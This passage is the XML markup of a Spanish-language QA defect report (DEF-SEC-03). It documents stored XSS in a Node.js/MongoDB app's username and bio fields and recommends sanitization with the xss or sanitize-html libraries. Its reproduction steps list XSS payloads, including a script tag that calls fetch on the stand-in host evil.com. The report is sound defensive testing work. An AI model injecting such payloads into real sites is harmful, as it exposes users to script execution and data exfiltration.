              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Reporte de Defecto: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">DEF-SEC-03</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:gridSpan w:val="2"/>
            <w:shd w:fill="1F4E79" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Reporte de Defecto</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="25%"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Código</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="75%"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">DEF-SEC-03</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="25%"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Hardware y software</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="75%"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">PC, 16GB RAM, Intel Core i5 · Node.js 20 · Jest v29 + Supertest</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="25%"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Sistema operativo</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="75%"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Windows 11</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="25%"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Navegador</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="75%"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Google Chrome</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="25%"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Resolución</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="75%"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">1920x1080</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="25%"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Comentarios</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="75%"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Detectado en TC-SEC-06 — Seguridad OWASP A03 (Inyección) / A07 XSS almacenado</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="25%"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Nombre</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="75%"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Payloads XSS almacenados sin sanitizar en MongoDB</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="25%"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Descripción</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="75%"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Los campos username y bio almacenan tags HTML maliciosos (&lt;script&gt;, &lt;img onerror&gt;, &lt;svg onload&gt;) sin ningún proceso de sanitización. Riesgo de XSS almacenado al renderizar en el cliente.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="25%"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Encargado</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="75%"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Andrés Gustavo Arias Ruiz</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="25%"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Prioridad</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="75%"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Alta</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="25%"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Severidad</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="75%"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Alta</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="25%"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Precondiciones</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="75%"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">1. Backend corriendo.
2. MongoDB en memoria activo.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="25%"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Pasos</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="75%"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">1. POST /auth/register con username: "&lt;script&gt;alert(\"XSS\")&lt;/script&gt;".
2. Leer user.username en MongoDB.
3. Repetir con "&lt;img src=x onerror=alert(1)&gt;" y "&lt;svg onload=alert(1)&gt;".
4. PUT /profile con bio: "&lt;script&gt;fetch(evil.com)&lt;/script&gt;" y leer campo bio.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="25%"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Resultado esperado</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="75%"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">HTTP 400 o username/bio sanitizados (sin etiquetas HTML en BD).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="25%"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Resultado obtenido</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="75%"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">HTTP 201. user.username === "&lt;script&gt;alert(\"XSS\")&lt;/script&gt;" almacenado sin modificar. bio con payload &lt;script&gt; guardado íntegro.
Test [DEF-SEC-03] FALLA: expect(username).not.toMatch(/&lt;script/i) falla.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="25%"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Notas</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="75%"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Causa raíz: No existe sanitización en backend/routes/auth.js ni backend/routes/profile.js.
Correción: npm install xss; const clean = xss(username); o sanitize-html antes de guardar en BD.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="300"/>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="pct" w:w="100%"/>
        <w:tblBorders>
          <w:top w:val="single" w:color="C55A11" w:sz="6"/>
          <w:left w:val="single" w:color="C55A11" w:sz="6"/>
          <w:bottom w:val="single" w:color="C55A11" w:sz="6"/>
          <w:right w:val="single" w:color="C55A11" w:sz="6"/>
          <w:insideH w:val="single" w:color="auto" w:sz="4"/>
          <w:insideV w:val="single" w:color="auto" w:sz="4"/>
        </w:tblBorders>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="100"/>
        <w:gridCol w:w="100"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:gridSpan w:val="2"/>
            <w:shd w:fill="C55A11" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Reporte de Defecto: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
